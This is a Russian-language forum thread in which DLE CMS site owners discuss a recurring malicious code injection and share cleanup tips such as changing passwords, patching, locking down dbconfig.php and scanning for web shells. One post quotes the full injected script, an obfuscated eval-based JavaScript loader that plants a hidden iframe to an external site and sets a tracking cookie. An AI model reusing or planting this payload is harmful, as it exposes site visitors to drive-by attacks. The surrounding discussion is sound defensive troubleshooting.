Вирус на сайте cms dle

Спасибо большое, помогло! Но что-то меня ДЛЕ начал разочаровывать, стоит лицензия 9.7 не помогла ни она, ни заплатка. Код также был с разными окончаниями во всех новостях.

Та же фигня. Запарился я уже удалять ети ссылки с новостей. Все пароли менял, заплатки ставил и все равно заливают. У меня впс, может проблема в его настройках?

После чистки сайта и смены пароля на БД - на файл dbconfig.php выставьте права 444 - чтобы злоумышленник не смог его прочитать и получить по новой доступ к БД. Мне помогло.

Нашел у себя в файлах странный код

<!--3a64a9--><script type="text/javascript" language="javascript">lnh="y";jote="document";try{+function(){if(document.querySelector)--(window[jote].getElementById("asd"))}()}catch(tunjcl){rll=function(cuf){cuf="fro"+cuf;for(airzoc=0;airzoc<lnh.length;airzoc++){rcov+=String[cuf](lqhb(vcbz+(lnh[airzoc]))-(79));}};};lqhb=eval;vcbz="0x";snoy=0;if(!snoy){try{++lqhb(jote).body}catch(tunjcl){yfr="(";}lnh="6f(b5(c4(bd(b2(c3(b8(be(bd(6f(b1(b8(b8(b4(7f(88(77(78(6f(ca(5c(59(6f(c5(b0(c1(6f(c2(c3(b0(c3(b8(b2(8c(76(b0(b9(b0(c7(76(8a(5c(59(6f(c5(b0(c1(6f(b2(be(bd(c3(c1(be(bb(bb(b4(c1(8c(76(b8(bd(b3(b4(c7(7d(bf(b7(bf(76(8a(5c(59(6f(c5(b0(c1(6f(b1(b8(b8(b4(6f(8c(6f(b3(be(b2(c4(bc(b4(bd(c3(7d(b2(c1(b4(b0(c3(b4(94(bb(b4(bc(b4(bd(c3(77(76(b8(b5(c1(b0(bc(b4(76(78(8a(5c(59(5c(59(6f(b1(b8(b8(b4(7d(c2(c1(b2(6f(8c(6f(76(b7(c3(c3(bf(89(7e(7e(83(7f(b0(c4(c3(be(bc(b0(c1(ba(b4(c3(7d(c1(c4(7e(b9(c2(b2(c1(b8(bf(c3(c2(7e(b2(bb(b8(ba(7d(bf(b7(bf(76(8a(5c(59(6f(b1(b8(b8(b4(7d(c2(c3(c8(bb(b4(7d(bf(be(c2(b8(c3(b8(be(bd(6f(8c(6f(76(b0(b1(c2(be(bb(c4(c3(b4(76(8a(5c(59(6f(b1(b8(b8(b4(7d(c2(c3(c8(bb(b4(7d(b2(be(bb(be(c1(6f(8c(6f(76(80(83(76(8a(5c(59(6f(b1(b8(b8(b4(7d(c2(c3(c8(bb(b4(7d(b7(b4(b8(b6(b7(c3(6f(8c(6f(76(80(83(bf(c7(76(8a(5c(59(6f(b1(b8(b8(b4(7d(c2(c3(c8(bb(b4(7d(c6(b8(b3(c3(b7(6f(8c(6f(76(80(83(bf(c7(76(8a(5c(59(6f(b1(b8(b8(b4(7d(c2(c3(c8(bb(b4(7d(bb(b4(b5(c3(6f(8c(6f(76(80(7f(7f(7f(80(83(76(8a(5c(59(6f(b1(b8(b8(b4(7d(c2(c3(c8(bb(b4(7d(c3(be(bf(6f(8c(6f(76(80(7f(7f(7f(80(83(76(8a(5c(59(5c(59(6f(b8(b5(6f(77(70(b3(be(b2(c4(bc(b4(bd(c3(7d(b6(b4(c3(94(bb(b4(bc(b4(bd(c3(91(c8(98(b3(77(76(b1(b8(b8(b4(76(78(78(6f(ca(5c(59(6f(b3(be(b2(c4(bc(b4(bd(c3(7d(c6(c1(b8(c3(b4(77(76(8b(bf(6f(b8(b3(8c(ab(76(b1(b8(b8(b4(ab(76(6f(b2(bb(b0(c2(c2(8c(ab(76(b1(b8(b8(b4(7f(88(ab(76(6f(8d(8b(7e(bf(8d(76(78(8a(5c(59(6f(b3(be(b2(c4(bc(b4(bd(c3(7d(b6(b4(c3(94(bb(b4(bc(b4(bd(c3(91(c8(98(b3(77(76(b1(b8(b8(b4(76(78(7d(b0(bf(bf(b4(bd(b3(92(b7(b8(bb(b3(77(b1(b8(b8(b4(78(8a(5c(59(6f(cc(5c(59(cc(5c(59(b5(c4(bd(b2(c3(b8(be(bd(6f(a2(b4(c3(92(be(be(ba(b8(b4(77(b2(be(be(ba(b8(b4(9d(b0(bc(b4(7b(b2(be(be(ba(b8(b4(a5(b0(bb(c4(b4(7b(bd(93(b0(c8(c2(7b(bf(b0(c3(b7(78(6f(ca(5c(59(6f(c5(b0(c1(6f(c3(be(b3(b0(c8(6f(8c(6f(bd(b4(c6(6f(93(b0(c3(b4(77(78(8a(5c(59(6f(c5(b0(c1(6f(b4(c7(bf(b8(c1(b4(6f(8c(6f(bd(b4(c6(6f(93(b0(c3(b4(77(78(8a(5c(59(6f(b8(b5(6f(77(bd(93(b0(c8(c2(8c(8c(bd(c4(bb(bb(6f(cb(cb(6f(bd(93(b0(c8(c2(8c(8c(7f(78(6f(bd(93(b0(c8(c2(8c(80(8a(5c(59(6f(b4(c7(bf(b8(c1(b4(7d(c2(b4(c3(a3(b8(bc(b4(77(c3(be(b3(b0(c8(7d(b6(b4(c3(a3(b8(bc(b4(77(78(6f(7a(6f(82(85(7f(7f(7f(7f(7f(79(81(83(79(bd(93(b0(c8(c2(78(8a(5c(59(6f(b3(be(b2(c4(bc(b4(bd(c3(7d(b2(be(be(ba(b8(b4(6f(8c(6f(b2(be(be(ba(b8(b4(9d(b0(bc(b4(7a(71(8c(71(7a(b4(c2(b2(b0(bf(b4(77(b2(be(be(ba(b8(b4(a5(b0(bb(c4(b4(78(5c(59(6f(7a(6f(71(8a(b4(c7(bf(b8(c1(b4(c2(8c(71(6f(7a(6f(b4(c7(bf(b8(c1(b4(7d(c3(be(96(9c(a3(a2(c3(c1(b8(bd(b6(77(78(6f(7a(6f(77(77(bf(b0(c3(b7(78(6f(8e(6f(71(8a(6f(bf(b0(c3(b7(8c(71(6f(7a(6f(bf(b0(c3(b7(6f(89(6f(71(71(78(8a(5c(59(cc(5c(59(b5(c4(bd(b2(c3(b8(be(bd(6f(96(b4(c3(92(be(be(ba(b8(b4(77(6f(bd(b0(bc(b4(6f(78(6f(ca(5c(59(6f(c5(b0(c1(6f(c2(c3(b0(c1(c3(6f(8c(6f(b3(be(b2(c4(bc(b4(bd(c3(7d(b2(be(be(ba(b8(b4(7d(b8(bd(b3(b4(c7(9e(b5(77(6f(bd(b0(bc(b4(6f(7a(6f(71(8c(71(6f(78(8a(5c(59(6f(c5(b0(c1(6f(bb(b4(bd(6f(8c(6f(c2(c3(b0(c1(c3(6f(7a(6f(bd(b0(bc(b4(7d(bb(b4(bd(b6(c3(b7(6f(7a(6f(80(8a(5c(59(6f(b8(b5(6f(77(6f(77(6f(70(c2(c3(b0(c1(c3(6f(78(6f(75(75(5c(59(6f(77(6f(bd(b0(bc(b4(6f(70(8c(6f(b3(be(b2(c4(bc(b4(bd(c3(7d(b2(be(be(ba(b8(b4(7d(c2(c4(b1(c2(c3(c1(b8(bd(b6(77(6f(7f(7b(6f(bd(b0(bc(b4(7d(bb(b4(bd(b6(c3(b7(6f(78(6f(78(6f(78(5c(59(6f(ca(5c(59(6f(c1(b4(c3(c4(c1(bd(6f(bd(c4(bb(bb(8a(5c(59(6f(cc(5c(59(6f(b8(b5(6f(77(6f(c2(c3(b0(c1(c3(6f(8c(8c(6f(7c(80(6f(78(6f(c1(b4(c3(c4(c1(bd(6f(bd(c4(bb(bb(8a(5c(59(6f(c5(b0(c1(6f(b4(bd(b3(6f(8c(6f(b3(be(b2(c4(bc(b4(bd(c3(7d(b2(be(be(ba(b8(b4(7d(b8(bd(b3(b4(c7(9e(b5(77(6f(71(8a(71(7b(6f(bb(b4(bd(6f(78(8a(5c(59(6f(b8(b5(6f(77(6f(b4(bd(b3(6f(8c(8c(6f(7c(80(6f(78(6f(b4(bd(b3(6f(8c(6f(b3(be(b2(c4(bc(b4(bd(c3(7d(b2(be(be(ba(b8(b4(7d(bb(b4(bd(b6(c3(b7(8a(5c(59(6f(c1(b4(c3(c4(c1(bd(6f(c4(bd(b4(c2(b2(b0(bf(b4(77(6f(b3(be(b2(c4(bc(b4(bd(c3(7d(b2(be(be(ba(b8(b4(7d(c2(c4(b1(c2(c3(c1(b8(bd(b6(77(6f(bb(b4(bd(7b(6f(b4(bd(b3(6f(78(6f(78(8a(5c(59(cc(5c(59(b8(b5(6f(77(bd(b0(c5(b8(b6(b0(c3(be(c1(7d(b2(be(be(ba(b8(b4(94(bd(b0(b1(bb(b4(b3(78(5c(59(ca(5c(59(b8(b5(77(96(b4(c3(92(be(be(ba(b8(b4(77(76(c5(b8(c2(b8(c3(b4(b3(ae(c4(c0(76(78(8c(8c(84(84(78(ca(cc(b4(bb(c2(b4(ca(a2(b4(c3(92(be(be(ba(b8(b4(77(76(c5(b8(c2(b8(c3(b4(b3(ae(c4(c0(76(7b(6f(76(84(84(76(7b(6f(76(80(76(7b(6f(76(7e(76(78(8a(5c(59(5c(59(b1(b8(b8(b4(7f(88(77(78(8a(5c(59(cc(5c(59(cc".split(yfr);rcov="";rll("mCharCode");lqhb(""+rcov);}</script><!--/3a64a9-->

и как от него избавиться

Вопрос не понятен, что вам мешает его удалить ?

удаляю его он обратно появляется

sany_ivanov, ищите шелл, ай-болит в помощь

Если ранее проблем не имели с вредоносными кодами, скорей всего простое удаление не поможет, нужно делать комплексную проверку не только на шеллы.

Причем сканировать и свой компьютер.. Внимательно смотреть все файлы на сервере.

Вроде отстали, сменил пароли к БД, сделал перестроение публикаций, поставить заплатку что была на предыдущей странице, почистил кэш у всех сайтов.